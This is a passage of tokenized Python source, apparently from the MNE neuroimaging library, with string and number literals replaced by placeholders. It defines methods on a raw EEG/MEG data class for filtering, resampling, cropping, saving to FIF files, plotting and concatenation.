n_jobs , <EOL> copy = False ) <EOL> if l_freq is not None and h_freq is not None : <EOL> if l_freq < h_freq : <EOL> logger . info ( '<STR_LIT>' <EOL> % ( l_freq , h_freq ) ) <EOL> self . _data = band_pass_filter ( <EOL> self . _data , fs , l_freq , h_freq , <EOL> filter_length = filter_length , <EOL> l_trans_bandwidth = l_trans_bandwidth , <EOL> h_trans_bandwidth = h_trans_bandwidth , <EOL> method = method , iir_params = iir_params , picks = picks , <EOL> n_jobs = n_jobs , copy = False ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' <EOL> % ( h_freq , l_freq ) ) <EOL> self . _data = band_stop_filter ( <EOL> self . _data , fs , h_freq , l_freq , <EOL> filter_length = filter_length , <EOL> l_trans_bandwidth = h_trans_bandwidth , <EOL> h_trans_bandwidth = l_trans_bandwidth , method = method , <EOL> iir_params = iir_params , picks = picks , n_jobs = n_jobs , <EOL> copy = False ) <EOL> return self <EOL> @ verbose <EOL> def notch_filter ( self , freqs , picks = None , filter_length = '<STR_LIT>' , <EOL> notch_widths = None , trans_bandwidth = <NUM_LIT:1.0> , n_jobs = <NUM_LIT:1> , <EOL> method = '<STR_LIT>' , iir_params = None , mt_bandwidth = None , <EOL> p_value = <NUM_LIT> , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> fs = float ( self . info [ '<STR_LIT>' ] ) <EOL> if picks is None : <EOL> picks = _pick_data_or_ica ( self . info ) <EOL> if len ( picks ) < <NUM_LIT:1> : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> _check_preload ( self , '<STR_LIT>' ) <EOL> self . _data = notch_filter ( <EOL> self . _data , fs , freqs , filter_length = filter_length , <EOL> notch_widths = notch_widths , trans_bandwidth = trans_bandwidth , <EOL> method = method , iir_params = iir_params , mt_bandwidth = mt_bandwidth , <EOL> p_value = p_value , picks = picks , n_jobs = n_jobs , copy = False ) <EOL> return self <EOL> @ verbose <EOL> def resample ( self , sfreq , npad = None , window = '<STR_LIT>' , stim_picks = None , <EOL> n_jobs = <NUM_LIT:1> , events = None , copy = None , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> if npad is None : <EOL> npad = <NUM_LIT:100> <EOL> warn ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> DeprecationWarning ) <EOL> _check_preload ( self , '<STR_LIT>' ) <EOL> inst = _check_copy_dep ( self , copy ) <EOL> if events is None : <EOL> try : <EOL> original_events = find_events ( inst ) <EOL> except : <EOL> pass <EOL> sfreq = float ( sfreq ) <EOL> o_sfreq = float ( inst . info [ '<STR_LIT>' ] ) <EOL> offsets = np . concatenate ( ( [ <NUM_LIT:0> ] , np . cumsum ( inst . _raw_lengths ) ) ) <EOL> new_data = list ( ) <EOL> ratio = sfreq / o_sfreq <EOL> if stim_picks is None : <EOL> stim_picks = pick_types ( inst . info , meg = False , ref_meg = False , <EOL> stim = True , exclude = [ ] ) <EOL> stim_picks = np . asanyarray ( stim_picks ) <EOL> for ri in range ( len ( inst . _raw_lengths ) ) : <EOL> data_chunk = inst . _data [ : , offsets [ ri ] : offsets [ ri + <NUM_LIT:1> ] ] <EOL> new_data . append ( resample ( data_chunk , sfreq , o_sfreq , npad , <EOL> window = window , n_jobs = n_jobs ) ) <EOL> new_ntimes = new_data [ ri ] . shape [ <NUM_LIT:1> ] <EOL> if len ( stim_picks ) > <NUM_LIT:0> : <EOL> stim_resampled = _resample_stim_channels ( <EOL> data_chunk [ stim_picks ] , new_data [ ri ] . shape [ <NUM_LIT:1> ] , <EOL> data_chunk . shape [ <NUM_LIT:1> ] ) <EOL> new_data [ ri ] [ stim_picks ] = stim_resampled <EOL> inst . _first_samps [ ri ] = int ( inst . _first_samps [ ri ] * ratio ) <EOL> inst . _last_samps [ ri ] = inst . _first_samps [ ri ] + new_ntimes - <NUM_LIT:1> <EOL> inst . _raw_lengths [ ri ] = new_ntimes <EOL> inst . _data = np . concatenate ( new_data , axis = <NUM_LIT:1> ) <EOL> inst . info [ '<STR_LIT>' ] = sfreq <EOL> if inst . info . get ( '<STR_LIT>' ) is not None : <EOL> inst . info [ '<STR_LIT>' ] = min ( inst . info [ '<STR_LIT>' ] , sfreq / <NUM_LIT> ) <EOL> inst . _update_times ( ) <EOL> if events is None : <EOL> try : <EOL> resampled_events = find_events ( inst ) <EOL> if len ( resampled_events ) != len ( original_events ) : <EOL> warn ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> except : <EOL> pass <EOL> return inst <EOL> else : <EOL> if copy : <EOL> events = events . copy ( ) <EOL> events [ : , <NUM_LIT:0> ] = np . minimum ( <EOL> np . round ( events [ : , <NUM_LIT:0> ] * ratio ) . astype ( int ) , <EOL> inst . _data . shape [ <NUM_LIT:1> ] <EOL> ) <EOL> return inst , events <EOL> def crop ( self , tmin = <NUM_LIT:0.0> , tmax = None , copy = None ) : <EOL> """<STR_LIT>""" <EOL> raw = _check_copy_dep ( self , copy , default = True ) <EOL> max_time = ( raw . n_times - <NUM_LIT:1> ) / raw . info [ '<STR_LIT>' ] <EOL> if tmax is None : <EOL> tmax = max_time <EOL> if tmin > tmax : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if tmin < <NUM_LIT:0.0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> elif tmax > max_time : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % max_time ) <EOL> smin , smax = np . where ( _time_mask ( self . times , tmin , tmax , <EOL> sfreq = self . info [ '<STR_LIT>' ] ) ) [ <NUM_LIT:0> ] [ [ <NUM_LIT:0> , - <NUM_LIT:1> ] ] <EOL> cumul_lens = np . concatenate ( ( [ <NUM_LIT:0> ] , np . array ( raw . _raw_lengths , <EOL> dtype = '<STR_LIT:int>' ) ) ) <EOL> cumul_lens = np . cumsum ( cumul_lens ) <EOL> keepers = np . logical_and ( np . less ( smin , cumul_lens [ <NUM_LIT:1> : ] ) , <EOL> np . greater_equal ( smax , cumul_lens [ : - <NUM_LIT:1> ] ) ) <EOL> keepers = np . where ( keepers ) [ <NUM_LIT:0> ] <EOL> raw . _first_samps = np . atleast_1d ( raw . _first_samps [ keepers ] ) <EOL> raw . _first_samps [ <NUM_LIT:0> ] += smin - cumul_lens [ keepers [ <NUM_LIT:0> ] ] <EOL> raw . _last_samps = np . atleast_1d ( raw . _last_samps [ keepers ] ) <EOL> raw . _last_samps [ - <NUM_LIT:1> ] -= cumul_lens [ keepers [ - <NUM_LIT:1> ] + <NUM_LIT:1> ] - <NUM_LIT:1> - smax <EOL> raw . _raw_extras = [ r for ri , r in enumerate ( raw . _raw_extras ) <EOL> if ri in keepers ] <EOL> raw . _filenames = [ r for ri , r in enumerate ( raw . _filenames ) <EOL> if ri in keepers ] <EOL> if raw . preload : <EOL> raw . _data = raw . _data [ : , smin : smax + <NUM_LIT:1> ] . copy ( ) <EOL> raw . _update_times ( ) <EOL> return raw <EOL> @ verbose <EOL> def save ( self , fname , picks = None , tmin = <NUM_LIT:0> , tmax = None , buffer_size_sec = <NUM_LIT:10> , <EOL> drop_small_buffer = False , proj = False , fmt = '<STR_LIT>' , <EOL> overwrite = False , split_size = '<STR_LIT>' , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> check_fname ( fname , '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) <EOL> split_size = _get_split_size ( split_size ) <EOL> fname = op . realpath ( fname ) <EOL> if not self . preload and fname in self . _filenames : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if self . preload : <EOL> if np . iscomplexobj ( self . _data ) : <EOL> warn ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> type_dict = dict ( short = FIFF . FIFFT_DAU_PACK16 , <EOL> int = FIFF . FIFFT_INT , <EOL> single = FIFF . FIFFT_FLOAT , <EOL> double = FIFF . FIFFT_DOUBLE ) <EOL> if fmt not in type_dict . keys ( ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> reset_dict = dict ( short = False , int = False , single = True , double = True ) <EOL> reset_range = reset_dict [ fmt ] <EOL> data_type = type_dict [ fmt ] <EOL> data_test = self [ <NUM_LIT:0> , <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> if fmt == '<STR_LIT>' and np . iscomplexobj ( data_test ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> _check_fname ( fname , overwrite ) <EOL> if proj : <EOL> info = copy . deepcopy ( self . info ) <EOL> projector , info = setup_proj ( info ) <EOL> activate_proj ( info [ '<STR_LIT>' ] , copy = False ) <EOL> else : <EOL> info = self . info <EOL> projector = None <EOL> inv_comp = None <EOL> if self . comp is not None : <EOL> inv_comp = linalg . inv ( self . comp ) <EOL> set_current_comp ( info , self . _orig_comp_grade ) <EOL> start = int ( np . floor ( tmin * self . info [ '<STR_LIT>' ] ) ) <EOL> if tmax is None : <EOL> stop = self . last_samp + <NUM_LIT:1> - self . first_samp <EOL> else : <EOL> stop = int ( np . floor ( tmax * self . info [ '<STR_LIT>' ] ) ) <EOL> buffer_size = self . _get_buffer_size ( buffer_size_sec ) <EOL> _write_raw ( fname , self , info , picks , fmt , data_type , reset_range , <EOL> start , stop , buffer_size , projector , inv_comp , <EOL> drop_small_buffer , split_size , <NUM_LIT:0> , None ) <EOL> def plot ( self , events = None , duration = <NUM_LIT> , start = <NUM_LIT:0.0> , n_channels = <NUM_LIT:20> , <EOL> bgcolor = '<STR_LIT:w>' , color = None , bad_color = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> event_color = '<STR_LIT>' , scalings = None , remove_dc = True , order = '<STR_LIT:type>' , <EOL> show_options = False , title = None , show = True , block = False , <EOL> highpass = None , lowpass = None , filtorder = <NUM_LIT:4> , clipping = None ) : <EOL> """<STR_LIT>""" <EOL> return plot_raw ( self , events , duration , start , n_channels , bgcolor , <EOL> color , bad_color , event_color , scalings , remove_dc , <EOL> order , show_options , title , show , block , highpass , <EOL> lowpass , filtorder , clipping ) <EOL> @ verbose <EOL> def plot_psd ( self , tmin = <NUM_LIT:0.0> , tmax = <NUM_LIT> , fmin = <NUM_LIT:0> , fmax = np . inf , <EOL> proj = False , n_fft = <NUM_LIT> , picks = None , ax = None , <EOL> color = '<STR_LIT>' , area_mode = '<STR_LIT>' , area_alpha = <NUM_LIT> , <EOL> n_overlap = <NUM_LIT:0> , dB = True , show = True , n_jobs = <NUM_LIT:1> , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> return plot_raw_psd ( self , tmin = tmin , tmax = tmax , fmin = fmin , fmax = fmax , <EOL> proj = proj , n_fft = n_fft , picks = picks , ax = ax , <EOL> color = color , area_mode = area_mode , <EOL> area_alpha = area_alpha , n_overlap = n_overlap , <EOL> dB = dB , show = show , n_jobs = n_jobs ) <EOL> def plot_psd_topo ( self , tmin = <NUM_LIT:0.> , tmax = None , fmin = <NUM_LIT:0> , fmax = <NUM_LIT:100> , proj = False , <EOL> n_fft = <NUM_LIT> , n_overlap = <NUM_LIT:0> , layout = None , color = '<STR_LIT:w>' , <EOL> fig_facecolor = '<STR_LIT:k>' , axis_facecolor = '<STR_LIT:k>' , dB = True , <EOL> show = True , n_jobs = <NUM_LIT:1> , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> return plot_raw_psd_topo ( self , tmin = tmin , tmax = tmax , fmin = fmin , <EOL> fmax = fmax , proj = proj , n_fft = n_fft , <EOL> n_overlap = n_overlap , layout = layout , <EOL> color = color , fig_facecolor = fig_facecolor , <EOL> axis_facecolor = axis_facecolor , dB = dB , <EOL> show = show , n_jobs = n_jobs , verbose = verbose ) <EOL> def time_as_index ( self , times , use_first_samp = None , use_rounding = False ) : <EOL> """<STR_LIT>""" <EOL> if use_first_samp is None : <EOL> use_first_samp = False <EOL> else : <EOL> warn ( '<STR_LIT>' <EOL> '<STR_LIT>' , DeprecationWarning ) <EOL> index = super ( _BaseRaw , self ) . time_as_index ( times , use_rounding ) <EOL> if use_first_samp : <EOL> index -= self . first_samp <EOL> return index <EOL> @ deprecated ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def index_as_time ( self , index , use_first_samp = False ) : <EOL> """<STR_LIT>""" <EOL> return _index_as_time ( index , self . info [ '<STR_LIT>' ] , self . first_samp , <EOL> use_first_samp ) <EOL> def estimate_rank ( self , tstart = <NUM_LIT:0.0> , tstop = <NUM_LIT> , tol = <NUM_LIT> , <EOL> return_singular = False , picks = None , scalings = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> from . . cov import _estimate_rank_meeg_signals <EOL> start = max ( <NUM_LIT:0> , self . time_as_index ( tstart ) [ <NUM_LIT:0> ] ) <EOL> if tstop is None : <EOL> stop = self . n_times - <NUM_LIT:1> <EOL> else : <EOL> stop = min ( self . n_times - <NUM_LIT:1> , self . time_as_index ( tstop ) [ <NUM_LIT:0> ] ) <EOL> tslice = slice ( start , stop + <NUM_LIT:1> ) <EOL> if picks is None : <EOL> picks = _pick_data_channels ( self . info , exclude = '<STR_LIT>' , <EOL> with_ref_meg = False ) <EOL> if len ( picks ) == <NUM_LIT:1> : <EOL> return <NUM_LIT:1.0> , <NUM_LIT:1.0> <EOL> data = self [ picks , tslice ] [ <NUM_LIT:0> ] <EOL> out = _estimate_rank_meeg_signals ( <EOL> data , pick_info ( self . info , picks ) , <EOL> scalings = scalings , tol = tol , return_singular = return_singular ) <EOL> return out <EOL> @ property <EOL> def ch_names ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . info [ '<STR_LIT>' ] <EOL> @ property <EOL> def times ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _times <EOL> @ property <EOL> def n_times ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . last_samp - self . first_samp + <NUM_LIT:1> <EOL> def __len__ ( self ) : <EOL> return self . n_times <EOL> def load_bad_channels ( self , bad_file = None , force = False ) : <EOL> """<STR_LIT>""" <EOL> if bad_file is not None : <EOL> names = frozenset ( self . info [ '<STR_LIT>' ] ) <EOL> with open ( bad_file ) as fid : <EOL> bad_names = [ l for l in fid . read ( ) . splitlines ( ) if l ] <EOL> names_there = [ ci for ci in bad_names if ci in names ] <EOL> count_diff = len ( bad_names ) - len ( names_there ) <EOL> if count_diff > <NUM_LIT:0> : <EOL> if not force : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( bad_file , <EOL> self . _filenames [ <NUM_LIT:0> ] ) ) <EOL> else : <EOL> warn ( '<STR_LIT>' <EOL> % ( count_diff , bad_file , self . _filenames [ <NUM_LIT:0> ] ) ) <EOL> self . info [ '<STR_LIT>' ] = names_there <EOL> else : <EOL> self . info [ '<STR_LIT>' ] = [ ] <EOL> def append ( self , raws , preload = None ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( raws , list ) : <EOL> raws = [ raws ] <EOL> all_raws = [ self ] <EOL> all_raws += raws <EOL> _check_raw_compatibility ( all_raws ) <EOL> all_preloaded = self . preload and all ( r . preload for r in raws ) <EOL> if preload is None : <EOL> if all_preloaded : <EOL> preload = True <EOL> else : <EOL> preload = False <EOL> if preload is False : <EOL> if self . preload : <EOL> self . _data = None <EOL> self . preload = False <EOL> else : <EOL> nchan = self . info [ '<STR_LIT>' ] <EOL> c_ns = np . cumsum ( [ rr . n_times for rr in ( [ self ] + raws ) ] ) <EOL> nsamp = c_ns [ - <NUM_LIT:1> ] <EOL> if not self . preload : <EOL> this_data = self . _read_segment ( ) <EOL> else : <EOL> this_data = self . _data <EOL> if isinstance ( preload , string_types ) : <EOL> _data = np . memmap ( preload , mode = '<STR_LIT>' , dtype = this_data . dtype , <EOL> shape = ( nchan , nsamp ) ) <EOL> else : <EOL> _data = np . empty ( ( nchan , nsamp ) , dtype = this_data . dtype ) <EOL> _data [ : , <NUM_LIT:0> : c_ns [ <NUM_LIT:0> ] ] = this_data <EOL> for ri in range ( len ( raws ) ) : <EOL> if not raws [ ri ] . preload : <EOL> data_buffer = _data [ : , c_ns [ ri ] : c_ns [ ri + <NUM_LIT:1> ] ] <EOL> raws [ ri ] . _read_segment ( data_buffer = data_buffer ) <EOL> else : <EOL> _data [ : , c_ns [ ri ] : c_ns [ ri + <NUM_LIT:1> ] ] = raws [ ri ] . _data <EOL> self . _data = _data <EOL> self . preload = True <EOL> for r in raws : <EOL> self . _first_samps = np . r_ [ self . _first_samps , r . _first_samps ] <EOL> self . _last_samps = np . r_ [ self . _last_samps , r . _last_samps ] <EOL> self . _raw_extras += r . _raw_extras <EOL> self . _filenames += r . _filenames <EOL> self . annotations = _combine_annotations ( ( self . annotations , <EOL> r . annotations ) , <EOL> self . _last_samps , <EOL> self . _first_samps , <EOL> self . info [ '<STR_LIT>' ] ) <EOL> self . _update_times ( ) <EOL> if not ( len ( self . _first_samps ) == len ( self . _last_samps ) == <EOL> len ( self . _raw_extras ) == len ( self . _filenames ) ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> return deepcopy ( self ) <EOL> def __repr__ ( self ) : <EOL> name = self . _filenames [ <NUM_LIT:0> ] <EOL> name = '<STR_LIT:None>' if name is None else op . basename ( name ) <EOL> s = ( '<STR_LIT>' <EOL> % ( name , len ( self . ch_names ) , self . n_times , self . times [ - <NUM_LIT:1> ] ) ) <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , s ) <EOL> def add_events ( self , events , stim_channel = None ) : <EOL> """<STR_LIT>""" <EOL> if not self . preload : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> events = np . asarray ( events ) <EOL> if events . ndim != <NUM_LIT:2> or events . shape [ <NUM_LIT:1> ] != <NUM_LIT:3> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> stim_channel = _get_stim_channel ( stim_channel , self . info ) <EOL> pick = pick_channels ( self . ch_names , stim_channel ) <EOL> if len ( pick ) == <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' % stim_channel ) <EOL> pick = pick [ <NUM_LIT:0> ] <EOL> idx = events [ : , <NUM_LIT:0> ] . astype ( int ) <EOL> if np . any ( idx < self . first_samp ) or np . any ( idx > self . last_samp ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> % ( self . first_samp , self . last_samp ) ) <EOL> if not all ( idx == events [ : , <NUM_LIT:0> ] ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . _data [ pick , idx - self . first_samp ] += events [ : , <NUM_LIT:2> ] <EOL> def _get_buffer_size ( self , buffer_size_sec = None ) : <EOL> """<STR_LIT>""" <EOL> if buffer_size_sec is None : <EOL> if '<STR_LIT>' in self . info : <EOL> buffer_size_sec = self . info [ '<STR_LIT>' ] <EOL> else : <EOL> buffer_size_sec = <NUM_LIT> <EOL> return int ( np . ceil ( buffer_size_sec * self . info [ '<STR_LIT>' ] ) ) <EOL> def _check_preload ( raw , msg ) : <EOL> """<STR_LIT>""" <EOL> if not raw . preload : <EOL> raise RuntimeError ( msg + '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def _allocate_data ( data , data_buffer , data_shape , dtype ) : <EOL> """<STR_LIT>""" <EOL> if data is None : <EOL> if isinstance ( data_buffer , string_types ) : <EOL> data = np . memmap ( data_buffer , mode = '<STR_LIT>' , <EOL> dtype = dtype , shape = data_shape ) <EOL> else : <EOL> data = np . zeros ( data_shape , dtype = dtype ) <EOL> return data <EOL> def _index_as_time ( index , sfreq , first_samp = <NUM_LIT:0> , use_first_samp = False ) : <EOL> """<STR_LIT>""" <EOL> times = np . atleast_1d ( index ) + ( first_samp if use_first_samp else <NUM_LIT:0> ) <EOL> return times / sfreq <EOL> class _RawShell ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . first_samp = None <EOL> self . last_samp = None <EOL> self . _cals = None <EOL> self . _rawdir = None <EOL> self . _projector = None <EOL> @ property <EOL> def n_times ( self ) : <EOL> return self . last_samp - self . first_samp + <NUM_LIT:1> <EOL> def _write_raw ( fname , raw , info , picks , fmt , data_type , reset_range , start , <EOL> stop , buffer_size , projector , inv_comp , drop_small_buffer , <EOL> split_size , part_idx , prev_fname ) : <EOL> """<STR_LIT>""" <EOL> if part_idx > <NUM_LIT:0> : <EOL> base , ext = op . splitext ( fname ) <EOL> use_fname = '<STR_LIT>' % ( base , part_idx , ext ) <EOL> else : <EOL> use_fname = fname <EOL> logger . info ( '<STR_LIT>' % use_fname ) <EOL> fid , cals = _start_writing_raw ( use_fname , info , picks , data_type , <EOL> reset_range ) <EOL> first_samp = raw . first_samp + start <EOL> if first_samp != <NUM_LIT:0> : <EOL> write_int ( fid , FIFF . FIFF_FIRST_SAMPLE , first_samp ) <EOL> if part_idx > <NUM_LIT:0> and prev_fname is not None : <EOL> start_block ( fid , FIFF . FIFFB_REF ) <EOL> write_int ( fid , FIFF . FIFF_REF_ROLE , FIFF . FIFFV_ROLE_PREV_FILE ) <EOL> write_string ( fid , FIFF . FIFF_REF_FILE_NAME , prev_fname ) <EOL> if info [ '<STR_LIT>' ] is not None : <EOL> write_id ( fid , FIFF . FIFF_REF_FILE_ID , info [ '<STR_LIT>' ] ) <EOL> write_int ( fid , FIFF . FIFF_REF_FILE_NUM , part_idx - <NUM_LIT:1> ) <EOL> end_block ( fid , FIFF . FIFFB_REF ) <EOL> pos_prev = None <EOL> for first in range ( start , stop , buffer_size ) : <EOL> last = first + buffer_size <EOL> if last >= stop : <EOL> last = stop + <NUM_LIT:1> <EOL> if picks is None : <EOL> data , times = raw [ : , first : last ] <EOL> else : <EOL> data , times = raw [ picks , first : last ] <EOL> if projector is not None : <EOL> data = np . dot ( projector , data ) <EOL> if ( ( drop_small_buffer and ( first > start ) and <EOL> ( len ( times ) < buffer_size ) ) ) : <EOL> logger . info ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> break <EOL> logger . info ( '<STR_LIT>' ) <EOL> if pos_prev is None : <EOL> pos_prev = fid . tell ( ) <EOL> _write_raw_buffer ( fid , data , cals , fmt , inv_comp ) <EOL> pos = fid . tell ( ) <EOL> this_buff_size_bytes = pos - pos_prev <EOL> if this_buff_size_bytes > split_size / <NUM_LIT:2> : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if pos > split_size : <EOL> warn ( '<STR_LIT>' ) <EOL> if pos >= split_size - this_buff_size_bytes - <NUM_LIT:2> ** <NUM_LIT:20> : <EOL> next_fname , next_idx = _write_raw ( <EOL> fname , raw , info , picks , fmt , <EOL> data_type , reset_range , first + buffer_size , stop , buffer_size , <EOL> projector , inv_comp , drop_small_buffer , split_size , <EOL> part_idx + <NUM_LIT:1> , use_fname ) <EOL> start_block ( fid , FIFF . FIFFB_REF ) <EOL> write_int ( fid , FIFF . FIFF_REF_ROLE , FIFF . FIFFV_ROLE_NEXT_FILE ) <EOL> write_string ( fid , FIFF . FIFF_REF_FILE_NAME , op . basename ( next_fname ) ) <EOL> if info [ '<STR_LIT>' ] is not None : <EOL> write_id ( fid , FIFF . FIFF_REF_FILE_ID , info [ '<STR_LIT>' ] ) <EOL> write_int ( fid , FIFF . FIFF_REF_FILE_NUM , next_idx ) <EOL> end_block ( fid , FIFF . FIFFB_REF ) <EOL> break <EOL> pos_prev = pos <EOL> if raw . annotations is not None : <EOL> start_block ( fid , FIFF . FIFFB_MNE_ANNOTATIONS ) <EOL> write_float ( fid , FIFF . FIFF_MNE_BASELINE_MIN , raw . annotations . onset ) <EOL> write_float ( fid , FIFF . FIFF_MNE_BASELINE_MAX , <EOL> raw . annotations . duration + raw . annotations . onset ) <EOL> write_name_list ( fid , FIFF . FIFF_COMMENT , [ d . replace ( '<STR_LIT::>' , '<STR_LIT:;>' ) for d in <EOL> raw . annotations . description ] ) <EOL> if raw . annotations . orig_time is not None : <EOL> write_double ( fid , FIFF . FIFF_MEAS_DATE , raw . annotations . orig_time ) <EOL> end_block ( fid , FIFF . FIFFB_MNE_ANNOTATIONS ) <EOL> logger . info ( '<STR_LIT>' % use_fname ) <EOL> if info . get ( '<STR_LIT>' , False ) : <EOL> end_block ( fid , FIFF . FIFFB_SMSH_RAW_DATA ) <EOL> else : <EOL> end_block ( fid , FIFF . FIFFB_RAW_DATA ) <EOL> end_block ( fid , FIFF . FIFFB_MEAS ) <EOL> end_file ( fid ) <EOL> return use_fname , part_idx <EOL> def _start_writing_raw ( name , info , sel = None , data_type = FIFF . FIFFT_FLOAT , <EOL> reset_range = True ) : <EOL> """<STR_LIT>""" <EOL> info = pick_info ( info , sel ) <EOL> fid = start_file ( name ) <EOL> start_block ( fid , FIFF . FIFFB_MEAS ) <EOL> write_id ( fid , FIFF . FIFF_BLOCK_ID ) <EOL> if info [ '<STR_LIT>' ] is not None : <EOL> write_id ( fid , FIFF . FIFF_PARENT_BLOCK_ID , info [ '<STR_LIT>' ] ) <EOL> cals = [ ] <EOL> for k in range ( info [ '<STR_LIT>' ] ) : <EOL> info [ '<STR_LIT>' ] [ k ] [ '<STR_LIT>' ] = k + <NUM_LIT:1> <EOL> if reset_range is True : <EOL> info [ '<STR_LIT>' ] [ k ] [ '<STR_LIT>' ] = <NUM_LIT:1.0> <EOL> cals . append ( info [ '<STR_LIT>' ] [ k ] [ '<STR_LIT>' ] * info [ '<STR_LIT>' ] [ k ] [ '<STR_LIT>' ] ) <EOL> write_meas_info ( fid , info , data_type = data_type , reset_range = reset_range ) <EOL> if info . get ( '<STR_LIT>' , False ) : <EOL> start_block ( fid , FIFF . FIFFB_SMSH_RAW_DATA ) <EOL> else : <EOL> start_block ( fid , FIFF . FIFFB_RAW_DATA ) <EOL> return fid , cals <EOL> def _write_raw_buffer ( fid , buf , cals , fmt , inv_comp ) : <EOL> """<STR_LIT>""" <EOL> if buf . shape [ <NUM_LIT:0> ] != len ( cals ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if fmt not in [ '<STR_LIT>' , '<STR_LIT:int>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if np . isrealobj ( buf ) : <EOL> if fmt == '<STR_LIT>' : <EOL> write_function = write_dau_pack16 <EOL> elif fmt == '<STR_LIT:int>' : <EOL> write_function = write_int <EOL> elif fmt == '<STR_LIT>' : <EOL> write_function = write_float <EOL> else : <EOL> write_function = write_double <EOL> else : <EOL> if fmt == '<STR_LIT>' : <EOL> write_function = write_complex64 <EOL> elif fmt == '<STR_LIT>' : <EOL> write_function = write_complex128 <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if inv_comp is not None : <EOL> buf = np . dot ( inv_comp / np . ravel ( cals ) [ : , None ] , buf ) <EOL> else : <EOL> buf = buf / np . ravel ( cals ) [ : , None ] <EOL> write_function ( fid , FIFF . FIFF_DATA_BUFFER , buf ) <EOL> def _my_hilbert ( x , n_fft = None , envelope = False ) : <EOL> """<STR_LIT>""" <EOL> from scipy . signal import hilbert <EOL> n_fft = x . shape [ - <NUM_LIT:1> ] if n_fft is None else n_fft <EOL> n_x = x . shape [ - <NUM_LIT:1> ] <EOL> out = hilbert ( x , N = n_fft ) [ : n_x ] <EOL> if envelope is True : <EOL> out = np . abs ( out ) <EOL> return out <EOL> def _check_raw_compatibility ( raw ) : <EOL> """<STR_LIT>""" <EOL> for ri in range ( <NUM_LIT:1> , len ( raw ) ) : <EOL> if not isinstance ( raw [ ri ] , type ( raw [ <NUM_LIT:0> ] ) ) : <EOL> raise ValueError ( '<STR_LIT>' % ri ) <EOL> if not raw [ ri ] . info [ '<STR_LIT>' ] == raw [ <NUM_LIT:0> ] . info [ '<STR_LIT>' ] : <EOL> raise ValueError ( '<STR_LIT>' % ri ) <EOL> if not raw [ ri ] . info [ '<STR_LIT>' ] == raw [ <NUM_LIT:0> ] . info [ '<STR_LIT>' ] : <EOL> raise ValueError ( '<STR_LIT>' % ri ) <EOL> if not raw [ ri ] . info [ '<STR_LIT>' ] == raw [ <NUM_LIT:0> ] . info [ '<STR_LIT>' ] : <EOL> raise ValueError ( '<STR_LIT>' % ri ) <EOL> if not set ( raw [ ri ] . info [ '<STR_LIT>' ] ) == set ( raw [ <NUM_LIT:0> ] . info [ '<STR_LIT>' ] ) : <EOL> raise ValueError ( '<STR_LIT>' % ri ) <EOL> if not all ( raw [ ri ] . _cals == raw [ <NUM_LIT:0> ] . _cals ) : <EOL> raise ValueError ( '<STR_LIT>' % ri ) <EOL> if len ( raw [ <NUM_LIT:0> ] . info [ '<STR_LIT>' ] ) != len ( raw [ ri ] . info [ '<STR_LIT>' ] ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if not all ( _proj_equal ( p1 , p2 ) for p1 , p2 in <EOL> zip ( raw [ <NUM_LIT:0> ] . info [ '<STR_LIT>' ] , raw [ ri ] . info [ '<STR_LIT>' ] ) ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if not all ( r . orig_format == raw [ <NUM_LIT:0> ] . orig_format for r in raw ) : <EOL> warn ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> raw [ <NUM_LIT:0> ] . orig_format = '<STR_LIT>' <EOL> def concatenate_raws ( raws , preload = None , events_list = None ) : <EOL> """<STR_LIT>""" <EOL> if events_list is not None : <EOL> if len ( events_list ) != len ( 